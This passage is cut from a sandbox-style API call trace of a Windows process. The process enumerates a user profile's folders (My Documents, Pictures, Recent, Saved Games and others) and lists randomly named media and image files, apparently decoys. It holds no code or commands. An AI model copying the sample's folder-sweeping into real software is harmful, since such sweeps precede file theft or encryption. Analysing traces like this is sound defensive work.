ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x546384a0, ftCreationTime.dwHighDateTime=0x1d5db5c, ftLastAccessTime.dwLowDateTime=0x432941c0, ftLastAccessTime.dwHighDateTime=0x1d5e34a, ftLastWriteTime.dwLowDateTime=0x432941c0, ftLastWriteTime.dwHighDateTime=0x1d5e34a, nFileSizeHigh=0x0, nFileSizeLow=0x9f15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1W7m6.mp3", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe0b980, ftCreationTime.dwHighDateTime=0x1d5e6be, ftLastAccessTime.dwLowDateTime=0x8da456a0, ftLastAccessTime.dwHighDateTime=0x1d5de5d, ftLastWriteTime.dwLowDateTime=0x8da456a0, ftLastWriteTime.dwHighDateTime=0x1d5de5d, nFileSizeHigh=0x0, nFileSizeLow=0x833a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4KMSMI.mp3", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe368050, ftCreationTime.dwHighDateTime=0x1d5e6c8, ftLastAccessTime.dwLowDateTime=0x162a83c0, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0x162a83c0, ftLastWriteTime.dwHighDateTime=0x1d5e55a, nFileSizeHigh=0x0, nFileSizeLow=0x16d79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOr_ T9_U6.mp3", cAlternateFileName="DOR_T9~1.MP3")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb45a070, ftCreationTime.dwHighDateTime=0x1d5e5a0, ftLastAccessTime.dwLowDateTime=0x33040740, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0x33040740, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x56fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="erxVno osH7s5.mp3", cAlternateFileName="ERXVNO~1.MP3")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139ed60, ftCreationTime.dwHighDateTime=0x1d5e375, ftLastAccessTime.dwLowDateTime=0x2cf49ce0, ftLastAccessTime.dwHighDateTime=0x1d5deab, ftLastWriteTime.dwLowDateTime=0x2cf49ce0, ftLastWriteTime.dwHighDateTime=0x1d5deab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gg6LaR4dxDzOQomZJ1UL", cAlternateFileName="GG6LAR~1")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23666f60, ftCreationTime.dwHighDateTime=0x1d5d9c8, ftLastAccessTime.dwLowDateTime=0xd5c4fc90, ftLastAccessTime.dwHighDateTime=0x1d5e33b, ftLastWriteTime.dwLowDateTime=0xd5c4fc90, ftLastWriteTime.dwHighDateTime=0x1d5e33b, nFileSizeHigh=0x0, nFileSizeLow=0x15ae0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nZea.m4a", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c134e10, ftCreationTime.dwHighDateTime=0x1d5e262, ftLastAccessTime.dwLowDateTime=0x92845d80, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x92845d80, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0x18e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OVbE.m4a", cAlternateFileName="")) returned 1 [0227.756] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e8fc660, ftCreationTime.dwHighDateTime=0x1d5da78, ftLastAccessTime.dwLowDateTime=0x8d67e570, ftLastAccessTime.dwHighDateTime=0x1d5d7b0, ftLastWriteTime.dwLowDateTime=0x8d67e570, ftLastWriteTime.dwHighDateTime=0x1d5d7b0, nFileSizeHigh=0x0, nFileSizeLow=0x8bfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qIBVS54In6hNtRDm0Wt.m4a", cAlternateFileName="QIBVS5~1.M4A")) returned 1 [0227.757] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddb5dfc0, ftCreationTime.dwHighDateTime=0x1d5e276, ftLastAccessTime.dwLowDateTime=0x57528b50, ftLastAccessTime.dwHighDateTime=0x1d5e20c, ftLastWriteTime.dwLowDateTime=0x57528b50, ftLastWriteTime.dwHighDateTime=0x1d5e20c, nFileSizeHigh=0x0, nFileSizeLow=0x18696, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uahnmRfbMfNimbLS.m4a", cAlternateFileName="UAHNMR~1.M4A")) returned 1 [0227.757] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba6ed0a0, ftCreationTime.dwHighDateTime=0x1d5dfef, ftLastAccessTime.dwLowDateTime=0x50faf330, ftLastAccessTime.dwHighDateTime=0x1d5da75, ftLastWriteTime.dwLowDateTime=0x50faf330, ftLastWriteTime.dwHighDateTime=0x1d5da75, nFileSizeHigh=0x0, nFileSizeLow=0x50d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UIIE3qr3SE h.m4a", cAlternateFileName="UIIE3Q~1.M4A")) returned 1 [0227.757] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x278e4030, ftCreationTime.dwHighDateTime=0x1d5de33, ftLastAccessTime.dwLowDateTime=0x7dbaf380, ftLastAccessTime.dwHighDateTime=0x1d5d8b2, ftLastWriteTime.dwLowDateTime=0x7dbaf380, ftLastWriteTime.dwHighDateTime=0x1d5d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vbTY960", cAlternateFileName="")) returned 1 [0227.757] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 1 [0227.757] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 0 [0227.757] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.757] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.757] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0227.757] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.757] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.757] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.757] PathFindFileNameW (pszPath="") returned="" [0227.757] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 0xffffffff [0227.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.758] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0227.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.758] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.758] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.758] PathFindFileNameW (pszPath="") returned="" [0227.758] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x461909e0, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0xa565df90, ftLastAccessTime.dwHighDateTime=0x1d5dcc6, ftLastWriteTime.dwLowDateTime=0xa565df90, ftLastWriteTime.dwHighDateTime=0x1d5dcc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xb4anhaDsw_nEnBFeS", cAlternateFileName="XB4ANH~1")) returned 0xffffffff [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.758] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0227.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.758] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.758] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.758] PathFindFileNameW (pszPath="") returned="" [0227.758] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0071e40, ftCreationTime.dwHighDateTime=0x1d5e5b5, ftLastAccessTime.dwLowDateTime=0x2beaa8d0, ftLastAccessTime.dwHighDateTime=0x1d5e28e, ftLastWriteTime.dwLowDateTime=0x2beaa8d0, ftLastWriteTime.dwHighDateTime=0x1d5e28e, nFileSizeHigh=0x0, nFileSizeLow=0xc08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6XlUusTFEgTQeKIoy7.jpg", cAlternateFileName="6XLUUS~1.JPG")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ed6ba0, ftCreationTime.dwHighDateTime=0x1d5d81b, ftLastAccessTime.dwLowDateTime=0x7e353540, ftLastAccessTime.dwHighDateTime=0x1d5e105, ftLastWriteTime.dwLowDateTime=0x7e353540, ftLastWriteTime.dwHighDateTime=0x1d5e105, nFileSizeHigh=0x0, nFileSizeLow=0xea3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9420IVPIIMe9R.png", cAlternateFileName="9420IV~1.PNG")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef5bbf0, ftCreationTime.dwHighDateTime=0x1d5dce1, ftLastAccessTime.dwLowDateTime=0x8bcf0890, ftLastAccessTime.dwHighDateTime=0x1d5e059, ftLastWriteTime.dwLowDateTime=0x8bcf0890, ftLastWriteTime.dwHighDateTime=0x1d5e059, nFileSizeHigh=0x0, nFileSizeLow=0x483e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bQeuq f926D_hucx2X.png", cAlternateFileName="BQEUQF~1.PNG")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83452240, ftCreationTime.dwHighDateTime=0x1d5e3a6, ftLastAccessTime.dwLowDateTime=0x1948b710, ftLastAccessTime.dwHighDateTime=0x1d5d94e, ftLastWriteTime.dwLowDateTime=0x1948b710, ftLastWriteTime.dwHighDateTime=0x1d5d94e, nFileSizeHigh=0x0, nFileSizeLow=0xca73, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LsuBcnzVDaw5Lq.jpg", cAlternateFileName="LSUBCN~1.JPG")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6d5ff0, ftCreationTime.dwHighDateTime=0x1d5dd53, ftLastAccessTime.dwLowDateTime=0x3e177260, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x3e177260, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0xfc08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uNclF6hauoNOJdN8.png", cAlternateFileName="UNCLF6~1.PNG")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac4d1a0, ftCreationTime.dwHighDateTime=0x1d5de1b, ftLastAccessTime.dwLowDateTime=0xf9b53c90, ftLastAccessTime.dwHighDateTime=0x1d5da54, ftLastWriteTime.dwLowDateTime=0xf9b53c90, ftLastWriteTime.dwHighDateTime=0x1d5da54, nFileSizeHigh=0x0, nFileSizeLow=0x10d8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YyKbPUy.jpg", cAlternateFileName="")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 1 [0227.759] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0 [0227.759] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.759] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.759] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0227.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.760] PathFindFileNameW (pszPath="") returned="" [0227.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0xffffffff [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7218 | out: hHeap=0x630000) returned 1 [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7148 | out: hHeap=0x630000) returned 1 [0227.760] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0227.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.760] PathFindFileNameW (pszPath="") returned="" [0227.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66b38ff0, ftCreationTime.dwHighDateTime=0x1d5e517, ftLastAccessTime.dwLowDateTime=0xc0ae7fa0, ftLastAccessTime.dwHighDateTime=0x1d5e5f4, ftLastWriteTime.dwLowDateTime=0xc0ae7fa0, ftLastWriteTime.dwHighDateTime=0x1d5e5f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dqq7i08G7zkmy4eWB", cAlternateFileName="_DQQ7I~1")) returned 0xffffffff [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.760] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.760] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0227.761] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.761] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.761] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.761] PathFindFileNameW (pszPath="") returned="" [0227.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.761] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f7218 | out: hHeap=0x630000) returned 1 [0227.761] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.761] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, 